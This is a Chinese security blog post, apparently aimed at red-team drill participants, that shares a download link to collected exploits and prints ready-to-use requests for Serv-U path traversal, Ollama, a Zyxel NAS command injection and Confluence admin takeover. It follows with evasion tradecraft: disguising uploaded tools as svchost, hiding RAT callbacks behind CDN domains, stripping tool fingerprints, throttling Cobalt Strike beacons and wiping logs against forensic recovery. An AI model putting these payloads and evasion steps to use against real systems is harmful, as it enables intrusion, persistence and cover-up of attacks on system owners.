點擊"仙網攻城獅”關注我們哦~
不當想研發的滲透人不是好運維
讓我們每天進步一點點
簡介
都是網上收集的POC和EXP,最新收集時間是2024年五月,需要的自取。
表里沒有的可以翻翻之前的文章,資源比較零散沒有整合起來。
文件鏈接:
https://pan.baidu.com/s/1OiyRctbpROh5AZO0SJ9kzQ?pwd=6666
其他資源失效了請給我留言
實戰
CVE-2024-28995 Serv-U
EXP
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd
文章連接:https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
CVE-2024-37032 開源AI模型 Ollama 遠程代碼執行漏洞
POC:http://[victim]:11434/api/pull
文章連接:https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
CVE-2024-29972 – NsaRescueAngel后門賬戶
POC:ip后面直接添加
/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__('subprocess').check_output('id', shell=True)%23信息泄露
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0"
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--
CVE-2023-22515-Atlassian Confluence Data Center 權限管理不當
EXPGET /server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: localhost:8090
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Atlassian-Token: no-check在進行覆蓋 setupComplete=false 之后重新注冊管理員POST /setup/setupadministrator.action HTTP/1.1
Host:127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencodedusername=elk&fullName=elk&email=elk@qq.comt&password=elk&confirm=elk&setup-next-button=Next
祝各位HVV順利
工作環境
工作時全部操作均在虛擬機中完成
虛擬機中不登陸個人賬號,如QQ、微信、網盤、CSDN等
滲透環境、開發環境、調試環境需要分開,從目標服務器上下載的程序需要在單獨的環境中測試運行
滲透虛擬機中全程使用代理IP上網
物理機必須安裝安全防護軟件,并安裝最新補丁,卸載與公司相關的特定軟件
fofa、cmd5、天眼查等第三方工具平臺賬號密碼不得與公司有關,云協作平臺同理
RAT使用CDN保護的域名上線
盡量不使用公司網絡出口,可以使用移動4G網卡,然后虛擬機再鏈代理
滲透工具
WebShell不能使用普通一句話木馬,連接端使用加密流量,建議使用蟻劍
不使用默認冰蝎,需要修改為硬編碼密鑰
內網滲透時盡量使用socks代理,在本地操作
上傳程序到目標服務器時,需要修改文件名:如svchost等,盡量不上傳內部自研工具
公開工具需要去除特征指紋,如:sqlmap、masscan、Beacon證書
工具需要設置線程或訪問頻率,如sqlmap的--delay、內網掃描時線程不大于5
Cobalt Strike后?上線后,設置time.sleep?于500秒
手機短信驗證碼需使用在線平臺如z-sms.com
socks代理通道需要使用SSL加密
重點
攻防演習成功的關鍵是團隊協作,要互相幫助學習和進步,不要勾心斗角,每個團隊的成功都需要有人當紅花有人當綠葉的,外網打點與內網滲透同等重要
滲透過程中,記住上傳的webshell、木馬等地址,服務器添加的賬號,項目結束后要刪除或描述在報告中,避免不必要的麻煩
登陸3389不建議添加用戶,嘗試激活guest,如必須要添加賬號,賬號名與目標相關即可,避免使用qax、qaxNB等友商關鍵詞
清理日志時需要以文件覆蓋的方式刪除文件,防止數據恢復,或者僅刪除指定ID的日志
碰到蜜罐就不要慌,多喝點花茶,這樣嘎了會比較香
往期內容
2023HW-8月(10-15)53個0day,1day漏洞匯總含POC、EXP
Stable DiffusionAI繪畫一鍵啟動整合包
能讓你躺著挖洞的BurpSuite插件
更多資訊長按二維碼 關注我們
? ?專業的信息安全團隊,給你最安全的保障。定期推送黑客知識和網絡安全知識文章,讓各位了解黑客的世界,學習黑客知識,普及安全知識,提高安全意識。
覺得不錯點個“贊”唄? ? ??